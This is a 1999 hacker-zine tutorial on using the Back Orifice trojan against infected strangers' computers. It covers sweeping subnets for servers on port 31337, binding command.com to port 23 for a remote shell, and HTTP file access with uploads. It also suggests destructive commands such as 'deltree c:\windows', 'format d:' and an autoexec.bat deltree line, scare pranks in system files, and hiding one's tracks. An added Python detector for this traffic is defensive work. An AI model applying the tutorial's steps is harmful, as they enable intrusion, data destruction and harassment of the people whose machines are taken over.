 _________ SWAT MAGAZINE ISSUE FIFTEEN: MARCH 1999 __________
/ \___________________________________________/ \
/             Getting started with Back Orifice             \
/                      By Mister Damage                     \
-----------------------------------------------------------------------

1. Finding a victim
2. Telnetting to a hard drive
3. HTTP enabling
4. Fun with win.ini and autoexec.bat


1. Finding a victim

Load up bogui.exe.

In the Target host:port box, enter an IP subnet to scan, e.g. 194.168.60.*
Always include the wildcard, as this is what tells bogui to sweep the
range instead of talking to a single host.

Click Send and wait. If you find a victim, something like this will show:

  *** Beginning ping sweep of 194.168.70.*
  ---------- Packet received from host 194.168.70.140 port 31337 --------
  !PONG!1.20!DEFAULT!
  ------------------------- End of Data -------------------
  *** Site found: 194.168.70.140

The reply comes back from port 31337, Back Orifice's default listening
port, and the !PONG! banner carries the server version (1.20 here) and a
name field. And now the fun begins....


2. Telnetting to a hard drive

Load up bogui.exe and boclient.exe.

Find a victim and remember the full IP.

In boclient, type in:

  host <victim ip>

Then type:

  appadd command.com 23

You should get some text come up saying you got a response, etc. This
binds a copy of command.com to TCP port 23 on the victim, so that whoever
connects to that port is talking to the DOS shell.

Load up telnet and connect to the IP address through port 23. If this is
successful, you should get a DOS session start through telnet.

Remember: you can't run full-screen programs through the telnet session;
for example, the command

  edit autoexec.bat

will not work. (Attrib, deltree and format are external programs too, so
the limit isn't on external programs as such, only on programs that draw
the screen directly instead of reading and writing plain text.) Commands
that just read and write text work fine, such as:

  attrib -r -h system.dat
  deltree c:\windows
  format d:

Use your imagination :)


3. HTTP enabling

Load up bogui.exe and find a victim.

Enter the full IP address into the Target host box.

Select HTTP enable from the command list.

In the box on the left that says Port, enter a port number; this can be
anything that isn't already in use on the victim.

Click Send. You should get a response saying HTTP has been enabled on
that port.

Load up your web browser (I recommend using Netscape....) and enter the
IP and port like this:

  http://<victim ip>:<port>

If it has worked, the victim's hard drives and CD-ROMs should be listed
like an FTP site. Click on C:\, for example, and it will list all files
and directories; at the bottom of the page there will be a box for
uploading files....


4. Fun with win.ini and autoexec.bat

Once you have your BO victim, it's far more fun to fiddle with their
system files and give 'em a scare than to totally destroy their hard
drive(s).

Great fun can be had with the shell= line. On Windows 95/98 it actually
lives in the [boot] section of system.ini rather than in win.ini, so look
there for:

  shell=Explorer.exe

and change it to:

  shell=Progman.exe

to give that Windows 3.1 flavour.....

Or how about changing their desktop? Make your own background, say
fucked.bmp, upload it to their hard drive (the upload box from section 3
will do) and look for this line in the [Desktop] section of win.ini:

  Wallpaper=tiles.bmp

which becomes:

  Wallpaper=fucked.bmp

When they restart, your wallpaper will be on their desktop :)

The rest of win.ini is fairly self-explanatory. Look for lines like these
and use your imagination:

  iCountry=44
  NullPort=None
  sLongDate=dd MMMM yyyy
  sShortDate=dd/MM/yy
  bmp=C:\Progra~1\Access~1\mspaint.exe ^.bmp
  ZIP=C:\PROGRA~1\WINZIP\winzip32.exe ^.ZIP

(The country and date lines are [intl] settings; the last two are
[Extensions] entries that map a file extension to the program that opens
it.)

The autoexec.bat requires some knowledge of DOS, but just as much fun can
be had.... For example, the prompt command.

The prompt command is a little feature built into DOS that lets you
change the appearance of the DOS prompt simply by typing prompt followed
by what you want it to say. The prompt uses a simple code; the default is:

  prompt $p$g

which gives:

  C:\>

($p is the current drive and path, $g is the > character.) However, type
in:

  prompt this computer has been fucked

and their prompt will be:

  this computer has been fucked

There are plenty of things that can be added on as well:

  prompt this$_computer$_has$_been$_fucked

will give a prompt like this:

  this
  computer
  has
  been
  fucked

The $_ code makes the prompt move onto the next line.

Another little feature of DOS is the Ctrl+ characters. Typing

  prompt Ctrl+A

(which will appear as prompt ^A) gives a prompt of a little smiley face,
because character 1 in the OEM character set is drawn as a smiley. Fiddle
about with the Ctrl+ characters to see what else there is, but the most
annoying of these is Ctrl+G. Ctrl+G (character 7, BEL) makes the internal
PC speaker beep, so adding the line:

  prompt WARNING! MEMORY ALLOCATION ERROR!$_CMOS RESETING TO DEFAULT^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G

is gonna scare the shit out of your average PC user who knows nothing
about DOS; he's gonna crap himself when he switches on his PC and it
beeps at him twenty-odd times. I've also heard that pasting that about
500 times makes the PC lock up, and even if it doesn't, EVERY time he
enters a command at the DOS prompt it's gonna beep, and the same goes for
Ctrl+C (cancel the current command): HIGHLY irritating.

But use your imagination and see what you can do. It's a simple matter to
make the autoexec.bat attempt a hard drive format on boot-up; remember,
autoexec.bat runs each line exactly as if it had been typed at the DOS
prompt, so adding things like:

  deltree c:\"program files"\ /y

is gonna make sure somebody has a really bad day.....

P.S. Make use of the cls command to cover your tracks....
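Added here as a defensive counterpart to sections 1 and 2, and not part of the original SWAT article: a small Python detector that correlates the three things the procedure above leaves behind in network traffic, i.e. one source probing many hosts on port 31337, a host answering from 31337 with the !PONG!<version>!<name>! banner, and the same source then opening TCP port 23 on that host (the command.com shell bound with appadd). The log line format is invented for this example, the payload column is assumed to hold already-decoded BO text (BO obfuscates its datagrams on the wire, so a dumb sensor would only see the port pattern), the three-host sweep threshold is arbitrary, and the UDP transport is BO 1.20's documented default rather than something the article states.

```python
"""Flag Back Orifice sweep, PONG reply and follow-up shell traffic in a packet log.

Added example, not part of the original SWAT article. The log format below is
invented for this example; the port numbers and the !PONG!<version>!<name>!
banner are the ones the article shows.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

BO_PORT = 31337        # Back Orifice default server port (section 1 output)
SHELL_PORT = 23        # port the article binds command.com to: "appadd command.com 23"
SWEEP_THRESHOLD = 3    # distinct hosts probed on BO_PORT before we call it a sweep (assumption)

# Banner a BO 1.20 server returns to a client ping, e.g. "!PONG!1.20!DEFAULT!"
PONG_RE = re.compile(r"!PONG!(?P<version>[0-9.]+)!(?P<name>[^!]*)!")

# Constructed log line format (one line per datagram/segment):
#   <timestamp> <UDP|TCP> <src>:<sport> -> <dst>:<dport> <decoded payload or ->
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>UDP|TCP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<payload>.*)$"
)


@dataclass(frozen=True)
class Finding:
    kind: str    # bo_sweep | bo_infected_host | bo_shell_followup
    host: str    # the IP the finding is about
    detail: str


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def analyse(lines):
    """Correlate a sweep of many hosts on 31337, a !PONG! reply from 31337
    (an infected host), and a later TCP connection from the sweeper to port 23
    on that host (the command.com shell bound with appadd)."""
    events = [rec for rec in map(parse_line, lines) if rec]
    probed = defaultdict(set)   # scanner ip -> hosts it probed on BO_PORT
    infected = {}               # victim ip -> (version, name) from its PONG banner
    for e in events:
        if e["dport"] == BO_PORT:
            probed[e["src"]].add(e["dst"])
        if e["sport"] == BO_PORT:
            m = PONG_RE.search(e["payload"])
            if m:
                infected[e["src"]] = (m["version"], m["name"])

    findings = []
    scanners = {ip for ip, hosts in probed.items() if len(hosts) >= SWEEP_THRESHOLD}
    for ip in sorted(scanners):
        findings.append(Finding("bo_sweep", ip,
                                f"probed {len(probed[ip])} hosts on port {BO_PORT}"))
    for ip, (version, name) in infected.items():
        findings.append(Finding("bo_infected_host", ip,
                                f"BO {version} server answered PONG (name={name!r})"))
    seen = set()   # one follow-up finding per (scanner, victim) pair
    for e in events:
        if (e["proto"] == "TCP" and e["dport"] == SHELL_PORT
                and e["src"] in scanners and e["dst"] in infected
                and (e["src"], e["dst"]) not in seen):
            seen.add((e["src"], e["dst"]))
            findings.append(Finding("bo_shell_followup", e["dst"],
                                    f"tcp/{SHELL_PORT} from sweeper {e['src']}; "
                                    "likely command.com bound with appadd"))
    return findings


# Constructed sample: a sweep of three hosts, one PONG reply, then telnet to it.
SAMPLE_LOG = """\
1999-03-01T20:14:01 UDP 194.168.1.9:1045 -> 194.168.70.1:31337 -
1999-03-01T20:14:01 UDP 194.168.1.9:1045 -> 194.168.70.2:31337 -
1999-03-01T20:14:01 UDP 194.168.1.9:1045 -> 194.168.70.140:31337 -
1999-03-01T20:14:02 UDP 194.168.70.140:31337 -> 194.168.1.9:1045 !PONG!1.20!DEFAULT!
1999-03-01T20:14:30 TCP 194.168.1.9:1062 -> 194.168.70.140:23 -
1999-03-01T20:15:00 UDP 10.0.0.5:53 -> 194.168.70.140:1025 -
this line is noise and is skipped
""".splitlines()

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.kind:18} {f.host:16} {f.detail}")
```

Run against the constructed sample it reports the sweeper, the host that answered PONG, and the follow-up shell connection, in that order; the port-23 connection alone is not reported, since a telnet session is only interesting here once the same source has swept for BO and the target has identified itself as a BO server.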